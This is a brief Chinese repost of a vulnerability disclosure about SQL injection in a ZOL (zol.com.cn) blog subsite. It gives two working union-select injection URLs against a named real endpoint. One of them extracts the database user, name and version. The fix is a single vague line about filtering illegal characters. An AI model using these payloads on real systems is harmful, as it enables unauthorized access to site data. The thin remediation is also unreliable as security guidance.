欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

中关村在线博客子站SQL注入及修复方案

程序员文章站 2022-03-12 16:15:37
分析一下中关村的博客的漏洞... 12-07-07...

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5-- 
 中关村在线博客子站SQL注入及修复方案
 http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,concat(user(),0x7c,database(),0x7c,version()),4,5-- 
中关村在线博客子站SQL注入及修复方案
中关村在线博客子站SQL注入及修复方案
中关村在线博客子站SQL注入及修复方案
修复方案:
过滤参数提交非法字符或者拦截敏感字符等等。。。